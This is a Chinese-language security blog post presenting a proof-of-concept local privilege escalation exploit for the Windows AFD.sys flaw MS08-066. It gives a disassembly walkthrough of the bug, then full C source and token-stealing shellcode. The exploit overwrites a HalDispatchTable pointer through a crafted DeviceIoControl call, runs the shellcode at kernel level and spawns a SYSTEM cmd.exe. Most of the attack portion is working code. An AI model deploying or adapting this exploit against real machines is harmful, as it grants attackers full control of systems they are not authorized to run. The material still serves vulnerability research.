MS08-066 AFD.sys Local Privilege Escalation Exploit (POC)

文章作者:Eros412
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

MS Bulletin : http://www.microsoft.com/technet/security/Bulletin/MS08-066.mspx

**********计算IoControlCode过程**********

.text:00010B9F mov eax, [edx+0Ch] ; edx=CurrentStackLocation
.text:00010BA2 push esi
.text:00010BA3 mov esi, ecx
.text:00010BA5 mov ecx, eax ;ecx=IoControlCode
.text:00010BA7 shr ecx, 2
.text:00010BAA and ecx, 3FFh
.text:00010BB0 push edi
.text:00010BB1 mov edi, _AfdImmediateCallDispatch[ecx*4] ; ecx=0x0F

.data:00011FF8 _AfdImmediateCallDispatch dd 0 ; DATA XREF: AfdDispatchImmediateIrp(x,x)+12r
.data:00011FF8 ; AfdFastIoDeviceControl(x,x,x,x,x,x,x,x,x)+7Ar

.data:00012034 off_12034 dd offset AfdGetRemoteAddress(x,x,x,x,x,x,x,x)
.data:00012034 ; DATA XREF: .data:0001213Co

//0x12034-0x11FF8= 0x3C,所以ecx=(0x3C/4)=0x0F

PAGEAFD:0001AE64 cmp _AfdIoctlTable[esi], edi ;
PAGEAFD:0001AE6A jnz loc_20510
PAGEAFD:0001AE6A
PAGEAFD:0001AE70 mov [edx+1], al
PAGEAFD:0001AE73 mov esi, _AfdIrpCallDispatch[esi]

//我们从_AfdIoctlTable寻找一个运算后==0x0F的值

kd>dd _AfdIoctlTable
f81c3108 00012003 00012007 0001200b 0001200c
f81c3118 00012010 00012017 0001201b 0001201f
f81c3128 00012023 00012024 0001202b 0001202f
f81c3138 00012033 00012037 0001203b 0001203f
f81c3148 00012043 00012047 0001204b 0001204f

//答案是0001203f

***********************************************

*****************溢出过程**********************

PAGE:000171B5 cmp [ebp+OutputBufferLength], eax
PAGE:000171B8 jnb short loc_171C3
PAGE:000171B8
PAGE:000171BA mov [ebp+var_24], 80000005h
PAGE:000171C1 jmp short loc_171C9———————————————〉big problem!!!
PAGE:000171C1
PAGE:000171C3 ; —————————————————————————
PAGE:000171C3
PAGE:000171C3 loc_171C3: ; CODE XREF: AfdGetRemoteAddress(x,x,x,x,x,x,x,x)+50j
PAGE:000171C3 mov [ebp+OutputBufferLength], eax
PAGE:000171C6 mov [ebp+var_24], esi
PAGE:000171C6
PAGE:000171C9
PAGE:000171C9 loc_171C9: ; CODE XREF: AfdGetRemoteAddress(x,x,x,x,x,x,x,x)+59j
PAGE:000171C9 mov [ebp+ms_exc.disabled], esi

PAGE:000171E0 movzx ecx, word ptr [ebx+5Ah] ;
PAGE:000171E4 movzx esi, word ptr [ebx+58h] ;
PAGE:000171E8 add esi, [ebp+ebx_70h] ;
PAGE:000171EB mov edi, [ebp+OutputBuffer]———————–〉控制的OutputBuffer地址
PAGE:000171EE mov eax, ecx
PAGE:000171F0 shr ecx, 2
PAGE:000171F3 rep movsd————————–〉其实就是把sockaddr_in的内容拷贝,其中OutputBuffer地址里的内容被修改成
sockaddr_in.in_addr.s_addr,而这里的sockaddr_in就是accept()的socket里的
[HalDispatchTable]==sin_port
[HalDispatchTable=0x02]==AF_INET
[HalDispatchTable+0x04]==sockaddr_in.in_addr.s_addr

kd>dd HalDispatchTable
80538ab8 88880002 0100007f cccccccc cccccccc

PAGE:000171F5 mov ecx, eax ;
PAGE:000171F7 and ecx, 3 ;
PAGE:000171FA rep movsb

***********************************************

代码:
#include <Winsock2.h>
#include <stdio.h>
#include <windows.h>
char ShellCode[]="\x90\x90\x90\x90\x90\x90\xB8\x24\xF1\xDF"
"\xFF\x8B\x00\x8B\xB0\x20\x02\x00\x00\x8B"
"\xC6\x8B\x80\x88\x00\x00\x00\x2D\x88\x00"
"\x00\x00\x8B\x90\x84\x00\x00\x00\x83\xFA"
"\x04\x75\xEA\x8B\x80\xC8\x00\x00\x00\x89"
"\x86\xC8\x00\x00\x00\xC2\x08\x00";

typedef struct _THREAD_PARAMS
{
HANDLE hInitEvent;
HANDLE hReadyEvent;
} THREAD_PARAMS, *PTHREAD_PARAMS;

typedef DWORD (WINAPI *PNTALLOCATE)(        IN HANDLE ProcessHandle,
IN OUT PVOID            *BaseAddress,
IN ULONG                ZeroBits,
IN OUT PULONG           RegionSize,
IN ULONG                AllocationType,
IN ULONG                Protect );

typedef DWORD (WINAPI *PNTQUERYINTERVAL)(  ULONG ProfileSource,PULONG          Interval );

#pragma comment (lib, "ws2_32.lib")

VOID WINAPI FooServer(LPVOID pParam)
{
PTHREAD_PARAMS lParams = (PTHREAD_PARAMS)pParam;
SOCKET tcp_socket;
SOCKET local_client;
sockaddr_in localonly;
sockaddr_in remote;
int remoteLen = sizeof(remote);
localonly.sin_family=AF_INET;
localonly.sin_addr.s_addr = inet_addr("127.0.0.1");
localonly.sin_port=htons(0x8888);
tcp_socket= socket( AF_INET,SOCK_STREAM, 0 );
bind(tcp_socket,(sockaddr*)&localonly,sizeof(localonly));
SetEvent(lParams->hInitEvent);
listen(tcp_socket,2);
local_client = accept(tcp_socket,(struct sockaddr*)&remote,&remoteLen);
printf("\n\t-> Incoming connection: %s\n\n",inet_ntoa(remote.sin_addr));
WaitForSingleObject( lParams->hReadyEvent, -1 );
closesocket(local_client);
closesocket(tcp_socket);
return;
}

int main () {

printf("=====================================================================   \n");
printf("\t\tMS08-066  AFD.sys Local Privilege Escalation Exploit  (POC)   \n");
printf("\t\t    Coded and Modified by :Eros412               \n");
printf("\t\t   Special Thanks to : Ruben Santamarta       \n");
printf("=====================================================================   \n");

ULONG result;
int status;
PROCESS_INFORMATION                        pi;
STARTUPINFOA                                stStartup;
DWORD HookAddress = 0x80538ab8; //HalDispatchTable address,修改KeQueryIntervalProfile的call function 的地址
//8062cdc2 ff15bc8a5380    call    dword ptr [nt!HalDispatchTable+0x4 (80538abc)]
PVOID        ShellCodeMemory = (PVOID)0x01000000 ;
DWORD        MemorySize = 0x1000;
PNTALLOCATE        NtAllocateVirtualMemory;
PNTQUERYINTERVAL        NtQueryIntervalProfile;
THREAD_PARAMS lParams = {0};
char inBuff[0x40];
char outBuff[0x40];
DWORD junk ;
SOCKET tcp_socket;
struct sockaddr_in peer;
WSADATA ws;
WSAStartup(0x0202,&ws);
NtAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(GetModuleHandle(        "ntdll.dll"),
"NtAllocateVirtualMemory");

NtQueryIntervalProfile = ( PNTQUERYINTERVAL ) GetProcAddress(GetModuleHandle("ntdll.dll"),
"NtQueryIntervalProfile");

status = NtAllocateVirtualMemory( (HANDLE)-1,
&ShellCodeMemory,
0,
&MemorySize,
MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN,
PAGE_EXECUTE_READWRITE );

memset( ShellCodeMemory, 0x90, MemorySize );
memcpy((void*)((BYTE*)ShellCodeMemory + 0x100),ShellCode,80);
//"127.0.0.1" 在内存里==0x0100007F,所以shellcode放在后面(0x01000100)就没问题了
lParams.hInitEvent = CreateEvent(0, FALSE, FALSE, 0);
lParams.hReadyEvent = CreateEvent(0, FALSE, FALSE, 0);
memset(inBuff,0x90,sizeof(inBuff));
memset(outBuff,0x90,sizeof(outBuff));
CreateThread(         NULL,
0,
(LPTHREAD_START_ROUTINE)FooServer,
(LPVOID)&lParams,
0,
NULL);

peer.sin_family = AF_INET;
peer.sin_port = htons( 0x8888 );
peer.sin_addr.s_addr = inet_addr( "127.0.0.1" );
tcp_socket = socket(AF_INET, SOCK_STREAM, 0);
WaitForSingleObject(lParams.hInitEvent, -1);
connect(tcp_socket, (struct sockaddr*) &peer, sizeof(sockaddr_in));
DeviceIoControl((HANDLE)tcp_socket,
0x1203f,
(LPVOID)inBuff,sizeof(inBuff),
(LPVOID)HookAddress,0,
&junk,
NULL);
NtQueryIntervalProfile(3,&result);
SetEvent(lParams.hReadyEvent);
GetStartupInfo( &stStartup );
CreateProcess( NULL,
"cmd.exe",
NULL,
NULL,
TRUE,
NULL,
NULL,
NULL,
&stStartup,
&pi );

return 0;
}

Reference:

http://www.milw0rm.com/exploits/6757 – MS Windows XP/2003 AFD.sys Privilege Escalation Exploit (K-plugin) by Ruben Santamarta
http://www.whitecell.org/list.php?id=60 – Windows XP 核心驱动 AFD.sys 本地权限提升漏洞分析(ms08066) by Polymorphours

http://blogs.technet.com/swi/archive/2008/10/14/ms08-066-how-to-correctly-validate-and-capture-user-mode-data.aspx

相关日志

楼被抢了 2 层了... 抢座Rss 2.0或者 Trackback

  • 无痕

    不错不错
    有前途
    订阅了………..

发表评论